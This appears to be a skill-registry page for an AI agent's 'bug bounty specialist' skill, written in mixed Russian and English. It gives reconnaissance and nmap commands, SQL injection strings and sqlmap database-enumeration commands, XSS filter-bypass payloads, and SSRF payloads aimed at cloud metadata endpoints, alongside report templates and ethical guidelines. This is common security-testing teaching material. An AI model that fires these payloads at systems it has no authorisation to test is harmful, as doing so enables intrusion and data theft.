bug-bounty-program

Bug Bounty Program Specialist

Safety Notice

This listing is imported from skills.sh public index metadata. Review upstream SKILL.md and repository scripts before running.

Copy this and send it to your AI assistant to learn

Install skill "bug-bounty-program" with this command: npx skills add dengineproblem/agents-monorepo/dengineproblem-agents-monorepo-bug-bounty-program

Bug Bounty Program Specialist

Эксперт по исследованию уязвимостей и bug bounty hunting.

Методология тестирования

OWASP Top 10 Focus

  • Injection (SQL, NoSQL, LDAP, OS commands)

  • Broken Authentication

  • Sensitive Data Exposure

  • XML External Entities (XXE)

  • Broken Access Control

  • Security Misconfiguration

  • Cross-Site Scripting (XSS)

  • Insecure Deserialization

  • Using Components with Known Vulnerabilities

  • Insufficient Logging & Monitoring

Распределение усилий

  • Reconnaissance: 30%

  • Manual testing: 50%

  • Automated scanning: 20%

Reconnaissance

Subdomain Enumeration

Пассивное перечисление

amass enum -passive -d target.com -o subdomains.txt

Активное перечисление

subfinder -d target.com -all -o subfinder.txt

DNS брутфорс

gobuster dns -d target.com -w wordlist.txt -o gobuster.txt

Объединение результатов

cat subdomains.txt subfinder.txt gobuster.txt | sort -u > all_subs.txt

Technology Stack Identification

Wappalyzer CLI

wappalyzer https://target.com

WhatWeb

whatweb -a 3 https://target.com

Nuclei technology detection

nuclei -u https://target.com -t technologies/

Port Scanning

Быстрое сканирование

nmap -sS -sV -O -p- --min-rate 1000 target.com -oA nmap_full

Сканирование сервисов

nmap -sC -sV -p 80,443,8080,8443 target.com -oA nmap_services

SQL Injection Testing

Manual Detection

-- Error-based ' OR '1'='1 ' AND '1'='2 ' UNION SELECT NULL--

-- Time-based blind '; WAITFOR DELAY '00:00:05'-- ' OR SLEEP(5)--

-- Boolean-based blind ' AND 1=1-- ' AND 1=2--

SQLMap

Basic injection test

sqlmap -u "https://target.com/page?id=1" --batch

With authentication

sqlmap -u "https://target.com/page?id=1" --cookie="session=abc123" --batch

POST data

sqlmap -u "https://target.com/login" --data="user=test&pass=test" --batch

Database enumeration

sqlmap -u "https://target.com/page?id=1" --dbs --batch sqlmap -u "https://target.com/page?id=1" -D dbname --tables --batch

XSS Testing

Payload Types

// Reflected XSS <script>alert('XSS')</script> <img src=x onerror=alert('XSS')> <svg onload=alert('XSS')>

// DOM-based XSS javascript:alert('XSS') data:text/html,<script>alert('XSS')</script>

// Bypass filters <ScRiPt>alert('XSS')</ScRiPt> <img src=x onerror="&#x61;lert('XSS')"> <svg/onload=alert('XSS')>

// Stored XSS via different contexts "><script>alert('XSS')</script> '-alert('XSS')-' </title><script>alert('XSS')</script>

Context-Specific Payloads

// In HTML attribute " onfocus=alert('XSS') autofocus=" ' onfocus=alert('XSS') autofocus='

// In JavaScript string ';alert('XSS');// "-alert('XSS')-"

// In URL parameter javascript:alert('XSS') data:text/html,<script>alert('XSS')</script>

SSRF Testing

Basic Payloads

Localhost bypass

http://127.0.0.1 http://localhost http://[::1] http://0.0.0.0 http://127.1 http://0177.0.0.1

Cloud metadata

http://169.254.169.254/latest/meta-data/ http://metadata.google.internal/

Detection Methods

Out-of-band detection using Burp Collaborator

url = "http://your-collaborator-id.burpcollaborator.net"

Webhook.site for testing

url = "https://webhook.site/unique-id"

Report Writing

Structure

Vulnerability Report

Summary

[One-line description]

Severity

[Critical/High/Medium/Low] - CVSS Score: X.X

Affected Component

[URL/Endpoint/Feature]

Description

[Detailed technical explanation]

Steps to Reproduce

  1. [Step 1]
  2. [Step 2]
  3. [Step 3]

Proof of Concept

[Screenshots, code, requests]

Impact

[Business/technical impact]

Remediation

[Specific recommendations]

References

[CVE, OWASP, etc.]

CVSS Calculator Factors

  • Attack Vector (AV): Network/Adjacent/Local/Physical

  • Attack Complexity (AC): Low/High

  • Privileges Required (PR): None/Low/High

  • User Interaction (UI): None/Required

  • Scope (S): Unchanged/Changed

  • Confidentiality Impact (C): None/Low/High

  • Integrity Impact (I): None/Low/High

  • Availability Impact (A): None/Low/High

Tools Checklist

Reconnaissance

  • Amass / Subfinder

  • Nmap

  • Shodan

  • Google Dorks

Web Testing

  • Burp Suite

  • OWASP ZAP

  • SQLMap

  • Nuclei

Automation

  • ffuf (fuzzing)

  • httpx (probing)

  • waybackurls

  • gau (URLs gathering)

Ethical Guidelines

  • Stay in scope — тестируйте только разрешенные цели

  • Don't be destructive — избегайте DoS и потери данных

  • Protect data — не распространяйте найденные данные

  • Report responsibly — следуйте disclosure policy

  • Document everything — ведите детальные записи

  • Respect rate limits — не перегружайте системы

Program Selection Strategy

Criteria

  • Response time history

  • Bounty amounts

  • Scope breadth

  • Program maturity

  • Community feedback

Priority Matrix

Program Type Skill Level Potential

New programs Any High

Broad scope Intermediate Medium

Narrow scope Expert Low-Medium

VDP only Beginner Low

Source Transparency

This detail page is rendered from real SKILL.md content. Trust labels are metadata-based hints, not a safety guarantee.

Open in GitHubOpen in ClawHub

Related Skills

Related by shared tags or category signals.

Coding

sales-development-rep

No summary provided by upstream source.

Repository SourceNeeds Review
-60
dengineproblem
Coding

learning-development-plan

No summary provided by upstream source.

Repository SourceNeeds Review
-53
dengineproblem
Coding

typescript-expert

No summary provided by upstream source.

Repository SourceNeeds Review
-51
dengineproblem